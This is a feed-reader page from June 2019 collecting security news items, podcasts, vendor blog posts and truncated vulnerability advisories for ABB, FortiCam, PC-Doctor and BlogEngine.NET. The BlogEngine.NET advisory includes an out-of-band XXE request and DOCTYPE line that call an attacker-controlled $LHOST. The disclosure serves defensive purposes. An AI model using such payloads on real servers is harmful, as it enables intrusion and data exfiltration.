FreshRSS

🔒
❌ About FreshRSS
There are new available articles, click to refresh the page.
Today — June 24th 2019Your RSS feeds

Iran Targeting U.S. With Destructive Wipers, Warns DHS

By Lindsey O'Donnell
The Department of Homeland Security is warning that U.S. agencies are being targeted by Iranian-backed cyberattacks with destructive wiper malware.

Mozilla patched two Firefox zero-day flaws in one week

By John E Dunn
Two emergency zero days affecting a browser in one week counts as unusual - especially when they pop up as separate alerts two days apart.

Firefox logo

Mobile apps riddled with high-risk vulnerabilities, warns report

By Danny Bradbury
Be careful before installing that mobile app on your iOS or Android device - many mobile applications are riddled with vulnerabilities.

shutterstock_248776741

Desjardins’ employee from hell spills 2.9m records

By Lisa Vaas
The leak, carried out by a since-fired rogue employee, affected 2.7 million people and 173,000 businesses - about 41% of its clientele.

shutterstock_1240284217-compressor

Facebook posts reveal your hidden illnesses, say researchers

By Lisa Vaas
The language we use could be indicators of disease and, with patient consent, could be monitored just like physical symptoms.

shutterstock_688060576-compressor

He Cyberstalked Teen Girls for Years—Then They Fought Back

By Stephanie Clifford
How a hacker shamed and humiliated high school girls in a small New Hampshire town, and how they helped take him down.

The Internet Has Made Dupes—and Cynics—of Us All

By Zeynep Tufekci
The typical response to the onslaught of falsehood is to say, lol, nothing matters. But when so many of us are reaching this point, it really does matter.

Cisco cleans up critical flaws, Florida city forks out $600k to ransomware scumbags, and more from infosec land

Your quick guide to what else has been happening in computer security lately

Roundup Here's a quick Monday summary of recent infosec news, beyond what we've already reported.…

  • June 24th 2019 at 09:56

Monday review – the hot 20 stories of the week

By Naked Security writer
From Bella Thorne publishing her own nudes to the Yubikey recall - and everything in between. It's weekly roundup time.

Monday Review

Driving Xtreme Cuts: DXC Technology waves bye bye to 45% of Americas Security divison

50 roles shifted off to India

DXC Technology is sending hundreds of security personnel from the America's division down the redundancy chute and offshoring some of those roles to low-cost centres, insiders are telling us.…

  • June 24th 2019 at 08:08

XL-19-008 - ABB IDAL FTP Server Path Traversal Vulnerability

Posted by xen1thLabs on Jun 24

XL-19-008 - ABB IDAL FTP Server Path Traversal Vulnerability
========================================================================

Identifiers
-----------
XL-19-008
CVE-2019-7227
ABBVU-IAMF-1902006

CVSS Score
----------
7.3 (AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL FTP server fails...
  • June 24th 2019 at 07:06

XL-19-012 - ABB IDAL HTTP Server Uncontrolled Format String Vulnerability

Posted by xen1thLabs on Jun 24

XL-19-012 - ABB IDAL HTTP Server Uncontrolled Format String Vulnerability
========================================================================

Identifiers
-----------
XL-19-012
CVE-2019-7228
ABBVU-IAMF-1902007

CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL HTTP...
  • June 24th 2019 at 07:06

XL-19-009 - ABB HMI Hardcoded Credentials Vulnerability

Posted by xen1thLabs on Jun 24

XL-19-009 - ABB HMI Hardcoded Credentials Vulnerability
========================================================================

Identifiers
-----------
XL-19-009
CVE-2019-7225
ABBVU-IAMF-1902004
ABBVU-IAMF-1902011
ABBVU-IAMF-1902002

CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
xen1thLabs - Software Labs

Vulnerability summary
---------------------
The affected...
  • June 24th 2019 at 07:06

XL-19-004 - ABB IDAL FTP Server Uncontrolled Format String Vulnerability

Posted by xen1thLabs on Jun 24

XL-19-004 - ABB IDAL FTP Server Uncontrolled Format String Vulnerability
========================================================================

Identifiers
-----------
XL-19-004
CVE-2019-7230
ABBVU-IAMF-1902008

CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL FTP...
  • June 24th 2019 at 07:06

XL-19-010 - ABB IDAL HTTP Server Authentication Bypass Vulnerability

Posted by xen1thLabs on Jun 24

XL-19-010 - ABB IDAL HTTP Server Authentication Bypass Vulnerability
========================================================================

Identifiers
-----------
XL-19-010
CVE-2019-7226
ABBVU-IAMF-1902005

CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL HTTP...
  • June 24th 2019 at 07:06

XL-19-005 - ABB HMI Absence of Signature Verification Vulnerability

Posted by xen1thLabs on Jun 24

XL-19-005 - ABB HMI Absence of Signature Verification Vulnerability
========================================================================

Identifiers
-----------
XL-19-005
CVE-2019-7229
ABBVU-IAMF-1902003
ABBVU-IAMF-1902012

CVSS Score
----------
8.3 (AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
xen1thLabs - Software Labs

Vulnerability summary
---------------------
ABB HMI uses two...
  • June 24th 2019 at 07:06

XL-19-011 - ABB IDAL HTTP Server Stack-Based Buffer Overflow Vulnerability

Posted by xen1thLabs on Jun 24

XL-19-011 - ABB IDAL HTTP Server Stack-Based Buffer Overflow Vulnerability
========================================================================

Identifiers
-----------
XL-19-011
CVE-2019-7232
ABBVU-IAMF-1902009

CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL HTTP...
  • June 24th 2019 at 07:06

XL-19-007 - ABB IDAL FTP Server Buffer Overflow Vulnerability

Posted by xen1thLabs on Jun 24

XL-19-007 - ABB IDAL FTP Server Buffer Overflow Vulnerability
========================================================================

Identifiers
-----------
XL-19-007
CVE-2019-7231
ABBVU-IAMF-1902010

CVSS Score
----------
6.5 (AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL FTP server is...
  • June 24th 2019 at 07:06

APPLE-SA-2019-6-20-1 AirPort Base Station Firmware Update 7.8.1

Posted by Apple Product Security via Fulldisclosure on Jun 24

APPLE-SA-2019-6-20-1 AirPort Base Station Firmware Update 7.8.1

AirPort Base Station Firmware Update 7.8.1 is now available and
addresses the following:

AirPort Base Station Firmware
Available for: AirPort Express, AirPort Extreme, and AirPort Time
Capsule base stations with 802.11n
Impact: A remote attacker may be able to leak memory
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8581: Lucio Albornoz...
  • June 24th 2019 at 07:06

XL-19-006 - ABB HMI Outdated Software Components

Posted by xen1thLabs on Jun 24

XL-19-006 - ABB HMI Outdated Software Components
========================================================================

Identifiers
-----------
XL-19-006
ABBVU-IAMF-1902001
ABBVU-IAMF-1902010

CVSS Score
----------
7.1 (AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
xen1thLabs - Software Labs

Vulnerability summary
---------------------
ABB HMI uses outdated software components that are...
  • June 24th 2019 at 07:06

Fortinet FortiCam FCM-MB40 Vulnerabilities

Posted by XORcat on Jun 24

Original posting: https://xor.cat/2019/06/19/fortinet-forticam-vulns/

## Background

In March of 2019 I discovered five vulnerabilities in Fortinet's
FortiCam FCM-MB40[1] product.

Part-way through disclosing this vulnerability, I discovered that the
FCM-MB40 is manufactured by a company called Dynacolor Inc[2], which
calls the product "Q2-H"[3].

The FortiCam FCM-MB40 software version which I found these
vulnerabilities in was...
  • June 24th 2019 at 07:06

Re: Multiple Cross-site Scripting Vulnerabilities in Shopware 5.5.6

Posted by Henri Salo on Jun 24

Please use CVE-2019-12935 for this vulnerability.
  • June 24th 2019 at 07:04

Quarking Password Manager 3.1.84 - Clickjacking Vulnerability

Posted by gionreale on Jun 24

Quarking Password Manager 3.1.84 suffers from a clickjacking
vulnerability caused by allowing * within web_accessible_resources. An
attacker can take advantage of this vulnerability and cause significant
harm.

CVE-2019-12880
  • June 24th 2019 at 07:04

BlogEngine.Net XXE issues

Posted by aaron bishop on Jun 24

BlogEngine.NET, versions 3.3.7 and earlier, are vulnerable to an
Out-of-band XXE attack through syndication.axd and pingback.axd.

*syndication.axd *accepts an external xml as the value for apml through a
request such as:

http://$RHOST/blog/syndication.axd?*apml=http://$LHOST/oob.xml*

*pingback.axd* will parse a POST with an XML body, such as:

<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://$LHOST/ex.dtd&quot...
  • June 24th 2019 at 07:03

DoH! Will the new protocol change how infosec professionals work

By Jeff Peters

Andrew Wertkin, CTO of BlueCat Networks, returns to the podcast to discuss a new and hotly contested privacy technology called DNS over HTTPS (DoH), the ethical and procedural issues around DoH, and how it may change the way infosec professionals work. In the podcast, Wertkin and host Chris Sienko discuss: – Can you explain DNS […]

The post DoH! Will the new protocol change how infosec professionals work appeared first on Infosec Resources.


DoH! Will the new protocol change how infosec professionals work was first posted on June 24, 2019 at 2:00 am.
©2017 "InfoSec Resources". Use of this feed is for personal non-commercial use only. If you are not reading this article in your feed reader, then the site is guilty of copyright infringement. Please contact me at darren.dalasta@infosecinstitute.com

Hackers Used Two Firefox Zero Days to Hit a Crypto Exchange

By Emily Dreyfuss
A ransomware haul, a border security leak, and more of the week's top security news.

Mass Appeal - Paul's Security Weekly #609

By paul@securityweekly.com

This week, we welcome Vivek Ramachandran, Founder and CEO of the Pentester Academy, to talk about their AttackDefense Labs platform, and how the Pentester Academy is helping thousands of customers from government agencies to Fortune 500 companies! In the second segment, we welcome back Bryson Bort, Founder and CEO of Scythe, to talk about purple teaming, top attack simulation scenarios, and testing command and control channels! In the Security News, how not to prevent a cyberwar with Russia, the case against knee-jerk installation of Windows patches, U.S. Customs and Border Protection data breach is the result of a supply chain attack, and a phishing scam that hacks two factor authentication!

 

To learn more about SCYTHE, visit: https://securityweekly.com/scythe

Full Show Notes: https://wiki.securityweekly.com/Episode609

Visit https://www.securityweekly.com/psw for all the latest episodes!

 

Visit https://securityweekly.com/acm to sign up for a demo or buy our AI Hunter!

Follow us on Twitter: https://www.twitter.com/securityweekly

Like us on Facebook: https://www.facebook.com/secweekly

  • June 22nd 2019 at 09:00

PC-Doctor Toolbox before 7.3 has an Uncontrolled Search Path Element

Posted by Micah Wiseley on Jun 21

Full Disclosure

I. VULNERABILITY
-------------------------
Uncontrolled search path element vulnerability in PC-Doctor Toolbox prior
to version 7.3 allows local users to gain privileges and conduct DLL
hijacking attacks via a trojan horse DLL located in an unsecured directory
which has been added to the PATH environment variable.

II. CVE REFERENCE
-------------------------
CVE-2019-12280

III. VENDOR
-------------------------
PC-Doctor, Inc....
  • June 21st 2019 at 22:49

Political Clout - Enterprise Security Weekly #142

By paul@securityweekly.com

This week, we welcome Bryan Warren, President and Chief Consultant at WarSec Security, to talk about the Challenges of Healthcare Security! In our second segment, we'll talk about the challenges of inheriting someone else's code! In the Enterprise News, Docker desktop for Windows 10 will soon switch to WSL 2, Netskope introduces Zero-Trust secure access to private enterprise applications, 10 notable security acquisitions of 2019, and can your patching strategy keep up with the demands of open source?

 

Full Show Notes: https://wiki.securityweekly.com/ES_Episode142

Visit https://www.securityweekly.com/esw for all the latest episodes!

 

Follow us on Twitter: https://www.twitter.com/securityweekly

Like us on Facebook: https://www.facebook.com/secweekly

  • June 21st 2019 at 21:00

Cop Gets $585K After Colleagues Snooped on Her DMV Data

By Louise Matsakis
A jury this week finds that Minneapolis police officers abused their license database access. Dozens of other lawsuits have made similar claims.

Podcast: Dating App Privacy and NASA Cyberattack

By Lindsey O'Donnell
The Threatpost team discusses the top news of the week - from a NASA cyberincident to dating app privacy issues.

This Week in Security News: Cyberespionage Campaigns and Botnet Malware

By Jon Clay (Global Threat Communications)

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about a cyberespionage campaign targeting Middle Eastern countries anda botnet malware that infiltrates containers via exposed Docker APIs.

Read on:

Hackers Are After Your Personal Data – Here’s How to Stop Them

The latest FBI Internet Crime Complaint Center (IC3) report paints an accurate picture of the scale of online threats and shows that consumers need to take urgent steps to protect their most sensitive identity and financial data from online attackers.

Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East

Trend Micro uncovered a cyberespionage campaign targeting Middle Eastern countries and named it “Bouncing Golf” based on the malware’s code in the package named “golf.” 

Trend Micro Partners with VIVOTEK to Enhance IP Cameras Security

Trend Micro announced it has blocked 5 million attempted cyberattacks against IP cameras in just five months. Through its strategic partnership with VIVOTEK, Trend Micro’s IoT security solutions are embedded in globally deployed IP cameras to provide superior protection.

AESDDoS Botnet Malware Infiltrates Containers via Exposed Docker APIs

Trend Micro details an attack type where an API misconfiguration in the open-source version of the popular DevOps tool Docker Engine-Community allows attackers to infiltrate containers and run a variant of the Linux botnet malware AESDDoS.

Ransomware Repercussions: Baltimore County Sewer Charges, 2 Medical Services Temporarily Suspended

A ransomware attack in May prevented the Baltimore City and County governments from mailing the annual water and sewage tax bills to its residents due to unverifiable accounts of abnormally low or no water consumption in 2018. 

Hackers Have Carried Out 12 Billion Attacks Against Gaming Sites in 17 Months

Hackers have targeted the gaming industry by carrying out 12 billion credential stuffing attacks against gaming websites in 17 months, according to a new report by internet delivery and cloud services company Akamai. 

Critical Linux and FreeBSD Vulnerabilities Found by Netflix, Including One That Induces Kernel Panic

A Netflix researcher uncovered four critical vulnerabilities within the TCP implementations on Linux and FreeBSD kernels that are related to the minimum segment size (MSS) and TCP Selective Acknowledgement (SACK) capabilities. 

New Oracle WebLogic Zero-day Vulnerability Allows Remote Attacks Without Authentication

Oracle published an out-of-band security alert advisory on CVE-2019-2729, a zero-day deserialization vulnerability that could allow remote attackers to execute arbitrary code on targeted servers.

Xenotime, Hacking Group Behind Triton, Found Probing Industrial Control Systems of Power Grids in the US

The hacking group, Xenotime, behind intrusions targeting facilities in oil and gas industries has started probing industrial control systems (ICSs) of power grids in the U.S. and the Asia-Pacific region, researchers reported.

Data Breach Forces Medical Debt Collector AMCA to File for Bankruptcy Protection

US medical bill and debt collector American Medical Collection Agency (AMCA) has filed for bankruptcy protection in the aftermath of a disastrous data breach that resulted in the theft of information from clients including Quest Diagnostics, LabCorp, BioReference Laboratories and more.

Cryptocurrency Mining Botnet Arrives Through ADB and Spreads Through SSH

Trend Micro observed a new cryptocurrency mining botnet that arrives via open ADB (Android Debug Bridge) ports and can spread from an infected host to any system that has had a previous SSH connection with the host.

Hacker Groups Pounce on Millions of Vulnerable Exim Servers

Multiple groups are launching attacks against exposed Exim mail servers, trying to exploit a vulnerability that could give them permanent root access.

Florida City to Pay $600K Ransom to Hacker Who Seized Computer Systems Weeks Ago

Riviera Beach is paying $600,000 in Bitcoins to a hacker who took over local government computers after an employee clicked on a malicious email link three weeks ago.

Are you up-to-date on the best ways to lower the risk of hackers accessing your personal data? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Cyberespionage Campaigns and Botnet Malware appeared first on .

Cyber-Risks Hiding Inside Mobile App Stores

By Kelly Sheridan Staff Editor, Dark Reading
As the number of blacklisted apps on Google Play continues to drop, attackers find new ways to compromise smartphones.

  • June 21st 2019 at 18:15

Movie Tech Review: Child’s Play 2019

By Mark Nunnikhoven (Vice President, Cloud Research)
BETRAYED: A Trend Micro Child's Play Tech Review

A while back, Rik & Kasia Ferguson shared their thoughts on the movie, “Unfriended: The Dark Web.” The dark web and technology in general plays a pivotal role in the movie’s plot, so the team decided it would be interesting to have a real-world expert review.

Everyone had a lot of fun, and thus Trend Micro movie reviews were born. I was “fortunate” enough to get the next call. The downside? The movie is, “Child’s Play” and I don’t do horror movies well.

Opening night, I powered through, watched the movie and was…pleasantly surprised?

The Movie

Was there too much gore and violence? Absolutely. However, the movie was a lot better than I expected, with an eerie performance by Mark Hamill as the voice of Chucky. Aubrey Plaza, as Karen, played her role well, which added the only real-relatable character of any depth beyond Chucky.

How does this movie rate in the horror genre? No idea. What I do know is that I enjoyed it more than I expected—which was, an admittedly low bar—and found myself entertained for the duration.

[ Spoilers ahead : scroll down if you’re ok with that ]

⤵

⬇

⬇

⬇

⬇

⬇

⬇

⬇

⬇

⬇

⬇

Bad Training Data

Unlike the original entries in the series, this edition brings Chucky into the 21st century. Chucky is no longer a demonically possessed doll, but a blank slate in the form of a nascent AI in a robotic toy doll.

As with any AI or machine learning model, the AI starts off neutral. It requires training data in order to generate results. In Chucky’s case, he is a unique example of the “Buddi” product.

In a classic insider supply chain attack, a QA employee is fired by an overly abusive boss, but before he’s removed from the property, the employee is ordered to finish one last Buddi doll: Chucky.

This employee modifies Chucky’s code to remove any boundary checking for his core behaviours. This creates a truly unbounded, clean slate for the AI that is set out into the world.

Skipping ahead, Chucky is trained on a biased data set. This bias is the naive world view of a group of kids and their run-down neighbourhood. Chucky is exposed to crude humour, horror movies and heated emotional commentary…all without the context to process it.

This tunes the AI to generate the psychotic behaviour that fuels the rest of the movie.

IoT Insecurity

One of the features of this 21st century Buddi doll is the ability to control your smart home. Think of the doll like a walking Alexa or Google Home. Of course, there’s zero authentication or information security controls in place.

Once he’s synced with the latest update from the cloud, Chucky can simply wave his tiny finger and control the devices around him.

This leads to a number of issues around privacy (in this case, used to increase the suspense and move the plot forward) that mirror cases we’ve seen in the real world.

3rd party access to smart speakers to terrorize unsuspecting victims, remote viewing of private video streams, and manipulation of key devices, like thermostats, have all happened already in the real world, but not by rogue AIs.

…yet.

Lateral Movement

In the movie’s climax, Chucky really lets loose. He comes into his digital powers and starts to wreak havoc. Our heroes and supporting cast struggle to respond to this maniacal behaviour. The interesting point is that Chucky has developed enough as a character by this point to understand that it’s not maniacal behaviour from his perspective. To him, it’s perfectly reasonable. This underscores the fact that AI is only as good as it’s training data and won’t highlight bad results from a bad model.

While striving to reach his goal, Chucky—a trusted endpoint in the corporation’s services network—reaches out to all of the compatible devices within his local area.

This type of lateral movement is extremely common in today’s cyberattacks.

The movie presents the issue in an overly dramatic fashion (it is a movie after all), but the point stands up. Most technologies, IoT specifically, are generally designed with two types of endpoints: trusted and untrusted.

Security and privacy controls are then designed to prevent untrusted endpoints from accessing trusted endpoints. Trusted endpoints have little to no verification applied when communicating with each.

In “Child’s Play”, this results in disastrous consequences. In the real world, too.

The movie is a stark—and bloody—reminder that networks and systems need visibility across all endpoints and layers and layers of security and privacy controls.

Takeaways

The way the movie leverages poor AI training, a lack of IoT security, and lateral movement techniques is intriguing, but what really caught my attention is the larger trend within the horror and suspense genre.

Films are moving away from fantasy and otherworldly villains to digital ones. That’s a reflection of how big a role technology plays in our lives, as well as the general lack of deep understanding of how it works.

For me—and the security community—that’s a big challenge: helping people understand cybersecurity and privacy in context.

If you’re looking for a fun suspense film with a technology slant, I would—shockingly— recommend watching this movie. As long as you have realistic exceptions and remember that breaking most current IoT security is…child’s play.

[ 🤣Sorry, couldn’t resist ]

The post Movie Tech Review: Child’s Play 2019 appeared first on .

Four CVEs Describe SACKs of Linux and FreeBSD Vulnerabilities

By Dark Reading Staff
Four new CVEs present issues that have a potential DoS impact on almost every Linux user.

  • June 21st 2019 at 17:53

Pledges to Not Pay Ransomware Hit Reality

By Robert Lemos Contributing Writer
While risk analysts and security experts continue to urge companies to secure systems against ransomware, they are now also advising that firms be ready to pay.

  • June 21st 2019 at 16:45

Today’s Top Public Cloud Security Threats …And How to Thwart Them

Many enterprises today have inadvertently exposed proprietary information by failing to properly secure data stored in public cloud environments like AWS, Azure, and GCP. And while cloud computing has streamlined many business processes, it can also create a security nightmare when mismanaged. A simple misconfiguration or human error can compromise the security of your organization's entire cloud environment.

Whether your whole business or small portions operate in the cloud, it’s imperative to understand the cloud-specific threats facing your organization in order to find creative and impactful solutions for remediation and protection. Let’s start by walking through the top security challenges in the cloud today to gain a better understanding of this complicated and ever-evolving landscape.

Top Security Challenges in the Cloud

Top threat: Phishing

Phishing is very popular in the cloud today. It’s often deployed using PDF decoys hosted in public cloud that arrive as email attachments and claim to have legitimate content, such as an invoice, employee directory, etc. Furthermore, since the malicious pages are stored in public cloud, they fool users into thinking that they are dealing with a legitimate entity, such as Microsoft, AWS, or Google. Once received, such content is saved to cloud storage services, like Google Drive. As soon as attachments are shared, malware can propagate within an organization, leading to cloud phishing fan out. In a matter of minutes, a legitimate user’s account can be compromised and used as part of a phishing campaign, which is far harder to detect and mitigate.

Top threat: Cryptojacking

Cryptojacking occurs when a nefarious actor uses your public cloud compute resources without your authorization. Such attacks are indifferent to device type, service, or OS, making them especially dangerous. What’s more, because such attacks usually appear to be coming from legitimate users, they often go undetected for quite some time, allowing the actors to execute a number of attacks under the radar.

A deeper understanding of these threats is critical, but it doesn’t solve the problem. So, where do we go from here? Below are my recommendations on steps for combating the above risks (and others) in the cloud.

Recommendations for Better Cloud Security

Assess Your Risk Exposure

Organizations must deploy a real-time visibility and control solution for sanctioned and unsanctioned accounts to perform continuous assessment of the security posture of these accounts and to provide visibility into what is going on with your IaaS accounts. You must also track admin activity using logging services like Amazon CloudTrail and Azure Operational Insights to gather logs about everything that is going on in an environment. Additionally, consider deploying an IaaS-ready DLP solution to prevent sensitive data loss in web facing storage services, like AWS S3 and Azure Blob. And lastly, get real-time threat and malware detection and remediation for IaaS, SaaS, and Web. It’s imperative to continuously monitor and audit for IaaS security configuration to ensure compliance with standards and best practices and to make sure that the bad guys do not split in and fly under the radar.

Protect Sensitive Data from Insider Threats

While it sounds like common sense, many of today’s breaches occur when a user either intentionally or inadvertently shares sensitive information that compromises the security of an organization. To combat this, it’s important to educate all employees of the risks associated with doing business in the cloud. Warn users against opening untrusted attachments and executing files. Teach employees to verify the domains of links and identify common object store domains. Deploy real-time visibility and control solutions, as well as threat and malware detection solutions to monitor, detect, and remediate nefarious activity. And lastly, scan for sensitive content and apply cloud DLP policies to prevent unauthorized activity, especially from unsanctioned cloud apps. People are often the weakest link and proper training and education should be a priority for your business.

Follow Best Practices

Businesses should leverage compliance standards, such as NIST, CIS, and PCI, to easily benchmark risk and security. A lot of these tools will provide insights and recommendations for how to remediate various violations, but you should still understand that customization is key.

In order to thwart exposure, companies must have the capability to look at all cloud environments and perform assessments of how such resources are secured. And remember, every organization is different, and there is no one-size-fits-all approach to proper protection in the cloud. That said, by better understanding the threat landscape (whether within or outside your organization) and putting the proper tools in place, comprehensive cloud security is, indeed, possible.

About the author: Michael Koyfman is a Principal Global Solution Architect with Netskope. In his role, he advises Netskope customers on best practices around Netskope deployments and integrating Netskope solutions within customer environment by leveraging integration with customer technology ecosystem.

Copyright 2010 Respective Author at Infosec Island
  • June 21st 2019 at 16:02

We are security researchers at Carnegie Mellon University's Software Engineering Institute, CERT division. I'm here today with Zach Kurtz, a data scientist attempting to use machine learning techniques to detect vulnerabilities and malicious code. /r/nets

By /u/Rotem_Guttman

Zach Kurtz (Statistics Ph.D., CMU 2014) is a data scientist with Carnegie Mellon University's Software Engineering Institute, CERT Division. Zach has developed new evaluation methodologies for open-ended cyber warning competitions, built text-based classifiers, and designed cyber incident data visualization tools. Zach's experience has ranged outside of the pure cybersecurity domain, with research experience in inverse reinforcement learning, natural language processing, and deepfake detection. Zach began his data science career at the age of 14 with a school project on tagging Monarch butterflies near his childhood home in rural West Virginia.

Zach's most recent publicly available work might be of particular interest to /r/netsec subscribers.

Edit: Thank you for the questions. If you'd like to see more of our work, or have any additional questions you can contact Rotem or Zach off of our Author's pages.

submitted by /u/Rotem_Guttman
[link] [comments]

Startup Raises $13.7M to Stop Breaches with Behavioral Analytics

By Dark Reading Staff
TrueFort plans to use the funding to expand sales, marketing, R&D, customer support, and go-to-market initiatives.

  • June 21st 2019 at 15:15

Threat Roundup for June 14 to June 21

By Talos Group

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between June 14 and June 21. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More >>

Reference
TRU06212019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

Patrolling the New Cybersecurity Perimeter

By Tim Brown Vice President of Security at SolarWinds
Remote work and other developments demand a shift to managing people rather than devices.

  • June 21st 2019 at 14:00

Apply Military Strategy to Cybersecurity at Black Hat Trainings Virginia

By Black Hat Staff
This special October event in Alexandria, Virginia offers unique, practical courses in everything from data breach response to military strategy for cybersecurity.

  • June 21st 2019 at 13:00

Microsoft uses AI to push Windows 10 upgrade to users

By John E Dunn
From November, users running some versions of Windows 10 will be required to upgrade or find themselves unable to receive security updates.

shutterstock_293983433-compressor

Used Nest cams were letting previous owners spy on you

By Lisa Vaas
Google says it's fixed the issue, but we haven't heard details on how many, and which, products were affected.

nest cam

Millions of Dell PCs Vulnerable to Flaw in Third-Party Component

By Lindsey O'Donnell
A component in SupportAssist software pre-installed on Dell PCs - and other OEM devices - opens systems up to DLL hijacking attacks.
❌